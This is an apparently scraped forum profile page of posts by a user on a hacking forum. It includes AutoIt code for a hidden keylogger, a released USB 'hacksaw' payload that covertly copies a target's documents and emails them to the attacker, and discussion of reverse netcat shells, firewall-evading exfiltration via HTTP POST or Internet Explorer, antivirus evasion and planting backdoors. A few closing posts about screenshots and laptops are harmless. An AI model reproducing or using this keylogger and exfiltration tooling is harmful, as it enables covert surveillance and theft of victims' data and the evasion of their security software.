sc0rpi0
Posts posted by sc0rpi0

  1. Actually, I have made quite a good keylogger that has zero CPU usage.

    Don't use IsPressed... it's WAY too slow... around 100 CPU. Use hotkey.

    I won't post all the code now because it is too long, but here is the gist:
</grreplace>
<gr_replace lines="40-42" cat="clarify" orig="this only logs">
    This only logs when "a" is pressed.

    All you have to do is add in the other keys and you should be golden.

    #NoTrayIcon
    Global $log = ""
    
    HotKeySet ( "{a}" , "_a" )
    
    While 1
    sleep( 60000 )
    Fileopen( 1, "log.txt" )
    Filewrite( "log.txt", $log )
    Fileclose( "log.txt" )
    WEnd
    
    Func _a()
    HotKeySet ( "{a}")
    send("{a}")
    $log = $log & "a"
    HotKeySet ( "{a}" , "_a" )
    EndFunc

    this only logs when "a" is pressed.

    all you have to do is add in the other keys are you should be golden.

  2. There are many ways to get the log file out, but I kinda prefer the Gmail method using AutoIt because you don't have to use any external programs... Any normal hardware firewall should allow you email access. The problem that you're talking about is in regards to software firewalls, which you should probably disable before running this payload anyways... with a method like the AV killer programs...

    I have McAfee (and so do most of the people I know).

    I know for a fact that most people *do not* use hardware firewalls.

    McAfee firewall blocks all attempts made by the autoit program.

    I have made numerous attempts to "disable" my McAfee firewall (processkilling, etc).

    The only thing left would be to permanently disable the program (leaving massive tracks).

    The best solution is to bypass the firewall using a commonly used universal program (hence internet explorer).

  3. Ok, ok, ok... I am seeing it now...

    I know for a fact that having your compiled version of the payload is better to hide your fingertips, because you are compiling the mail account name and password into the same exe file, but what about doing it in the MySQL+PHP way that was written in this same forum? By the way, it assures the bypass for any router because it does the stuff using port 80.

    How about doing the PHP log transfer thing with AutoIt?

    When most programs are run, whether using php or smtp, they always trigger a question from decent firewalls.

    DO YOU WANT THIS PROGRAM TO ACCESS THE INTERNET?

    I think I have found a way to bypass this completely.

    AutoIt has a way of accessing webpages in the background with IE... which is typically already allowed internet access.

    Using this method and php, logs can be transferred without any kind of interruption.

    I have most of the stuff already coded in AutoIt. I am currently working out the bugs.

  4. You can't really make netcat undetectable... but it's easy enough to write a netcat clone in AutoIt or Python...

    Cool! If you have developed anything like this, please PM me the AutoIt code.

    Thanks.

  5. I was just using a reverse netcat shell.

    If you were planning on writing the keylogger in AutoIt you might want to rethink it... it eats up too much CPU.

    Really? The one I use in AutoIt works perfectly fine... I haven't noticed any CPU shortages (and my computer is not that good). The keylogger uses the hotkey feature.

    Do you know how to make netcat undetectable? Most antivirus applications are extremely hostile to it.

    I don't like using AV killers, and 99% of packers are detected.

    I thought of hex-editing, but gave up after an hour of trying.

  6. Cool work... I released my code for my AutoIt switchblade... I don't know if there's anything you wanted to use from it... My code is kinda noobish, but I liked the idea of AutoIt 'cause it's a bit better than batch scripts... There was also someone on here who released some code for a self-extracting AutoIt payload that uses FileInstall to include all the files into one exe...

    http://hak5.org/forums/index.php?showtopic=10486

    Yeah... AutoIt is kind of noobish in general... but much better than batch (in my humble opinion).

    The AutoIt payload looks great. It should help clean up and expand my payload.

    FileInstall is pretty good in general. Occasionally, I receive errors while using it.

    Eventually, I hope to expand my payload to include:

    - backdoor which works through firewalls (partly successful; the output doesn't always bounce back)

    - keylogger (almost finished)

    - self-propagating hacksaw (work in progress)

  7. SCORPIO HACKSAW PAYLOAD BETA 1.0

    By now, the current hacksaw is utterly useless without some kind of AV killer because the primary program (USB dumper) is detected and automatically deleted by antivirus.

    So, I have coded up a new version of USB dumper in AutoIt.

    In case it eventually becomes detected, I have included all source as well as binary.

    You can use the current binary or compile it with AutoIt from here:

    http://www.autoitscript.com/autoit3/downloads.shtml

    INSTRUCTIONS

    1. Change the info in config.ini to your own information.

    from=example@gmail.com (put in your own gmail account)

    to=example@gmail.com (put in your own gmail account)

    username=exampleusername (put in just your username)

    password=examplepassword (put in your password)

    2. If you would like, modify the file extensions in config.ini to those which you would like collected from a target USB drive (or just leave the current ones).

    ext1=.txt

    ext2=.doc

    ext3=.xls

    3. Run go.bat

    Please PM me any problems/concerns/questions.

    If anyone has an idea of how to upload files (other than ftp or email), please notify me.

    I don't think SQL would work... because it's not text data.

    DOWNLOAD HERE: http://www.mediafire.com/?gymdtgsmroj

  8. Hardware firewalls block all incoming connections by default. You specify what incoming ports you want open to which computers are running servers (port forwarding).

    Software firewalls are what you have to worry about... They block outgoing connections as well!

    Sending email is a no-no, as most anti-virus / software firewalls detect it, show the contents of the email being sent and ask whether to allow it or not.

    FTP? Nah, you don't want to embed your login and password into a program...

    So what is a good way thats undetectable and will work even if both software and hardware firewalls are in place?

    HTTP POST.

    Even if you have a software and hardware firewall, chances are you aren't going to block port 80 outgoing. It's needed for basic web functionality. You wouldn't be able to browse the web if it was blocked.

    All that's required is a free web host which offers PHP + MySQL. You have a program read the log file and POST the data to a server-side PHP script. The script then inserts the data into the database ;)

    You probably haven't seen it since it's low on the second page now.

    http://hak5.org/forums/index.php?showtopic=9644

    It's almost guaranteed that port 80 is open, and it's the most undetectable method. Therefore I think it's the best way.

    This sounds pretty cool. The only problem is that it's over my head (I don't know a thing about PHP nor SQL).

    I was also looking at the form-making tool provided in Google Docs. When a form is filled out, the contents are uploaded to the owner's account. Is there a way to automate inputting text into an online form?

    Thanks for your help.

  9. I fixed two missing spaces. I was trying to format the code to look pretty and probably broke it. (FILE *fp=NULL; LPVOID pBuf=NULL;)

    haha

    To sc0rpi0: I'm not sure if I made it clear enough before... when you run this, you don't have to push print screen... it does it automatically and saves out a bitmap file.

    In fact, if you wanted an all-in-one tool to save the contents of clipboard to a file, THEN grab a screenshot, you can insert some code to grab from the clipboard right before it does the key-down/key-up events on the Printscreen button.

    I just wish I had a compiler available so I could fix it up and build it.

    Sorry... my miscommunication.

    I was talking about the script *I* was trying to make.

    In my script, I worked out a way to automate the Printscreen button but can't figure out a way to intercept the shot from the clipboard. I am using AutoIt (a noob script language) for this.

  10. Do you mean screenshot or video? If it's a screenshot, use Print Screen. If video, I think Fraps has a free version, right?

    I am assuming you are doing this remotely since you don't want to install it, tho ;)

    1. Screenshot (must be automated though; Print Screen is not; I coded up a way to automate the Print Screen button but can't figure out how to automatically retrieve the screenshot from the clipboard).

    2. Yes, I am designing this to be done remotely.

  11. Visual Studio 2008 C# Solution: http://naturalorange.net/uploads/scrnshot_source.zip

    It's very simple, less than 15 lines. Mostly I just modified another project to work on the command line.

    If you don't have Visual Studio, you can just open the main program.cs file.

    Possible Features for the future would be adding a watermark to the image.

    --------------------------------------------------------------

    I'm working on a project that would copy anything from the clipboard to a file. Text/Image/Sound/Files.

    It's not working yet but I'm looking into it.

    If it's not too much trouble, please send me a copy too!

  12. If it's on Vista you can use the "clip" command to send things to or from the clipboard (text).

    You could probably make an app in C++ or C# pretty quickly using the Windows APIs.

    I could make one in C# for you, but it would require .NET 2.0 at least.

    I made one. get it here http://naturalorange.net/uploads/scrnshot.zip

    If you just run the exe, it will create a screenshot in the format year_month_day_hour_minute_second.png. Otherwise specify the name you want to use (scrnshot.exe filename.png). It requires .NET 2.0 framework. But no installation is needed.

    Thanks a bunch. This is exactly what I was looking for.

    Could I possibly get the source so that I can use it in future projects?

    Besides, I am kind of paranoid about executables that aren't either compiled by me or from an open-source website.

    Despite the fact that you are one of the last people I would be wary of, I can never take safety too far.

  13. Look for something alternative to snag it. There are free ones out there.

    Try this: http://www.shup.com/

    That needs installation (sorry, I forgot to mention that I don't want an app that needs install) and requires using the GUI to take a screenshot.

    RELATED QUESTION #2:

    Does anyone know how to dump the contents (text, pictures, etc.) of the clipboard to a directory using either the command prompt or a 3rd-party program?

    Thanks.

  14. I don't know for sure, but judging by his last topic I think he wants a command line utility that, when called, will take a screenshot of the current screen.

    Seems like he's trying to automate something.

    That is correct. I do not want to copy text out of cmd but to take a screenshot of the current screen.

  15. Do you mean a running window? Or do you want to hide a window, like if you used an old batch syslog and the DOS window doesn't close, and what you want to do is close the DOS window. Is that right?

    Yes, I want to hide a running window, not a DOS window.

  16. Does anyone know a way to hide an already existing window (preferably without using a GUI)?

    I know I can use nircmd to run a program and hide its window, but this isn't the problem.

    I want to hide a window of a program that has already been run.

    Thanks very much.

  17. I'm sorry if I miscommunicated.

    I am not attempting to "break into" a remote computer (gain access remotely) but to establish a "backdoor" so that a computer can be accessed later. Perhaps I am mistaken, but doesn't VNC need to make registry changes to operate?

    thanks.

  18. Question 1: Is it possible to remotely access a machine without admin privileges (regedits etc.)?

    If so...

    Question 2: Any recommendations concerning programs which are capable of doing this?

    Much appreciated.

  19. Hmm, while I don't admire turning others over to the authorities, maybe deleting all the files and talking to the guy would have been a better approach. It's never good, and you should never be proud to get someone else into trouble (unless it's something realllllly bad).

    It seems to me that if you both watch Hak5, you'd probably get along. It just sounds to me like an opportunity to make a friend, rather than completely fuck up some other kid's life.

    I agree! Very well put.

  20. I've had decent experience with Dell, mainly in a corporate environment. A lot of that is due to their amazing support if you're willing to pay for it.

    I had an Apple briefly and loved the build quality.

    My Asus Eee PC is the most awesome notebook I've ever owned but is nowhere near as "solid" as a MacBook Pro.

    So, do you mean "solid" as in quality of physical build or software or both?

    Can the MacBook Pro boot a BackTrack CD?
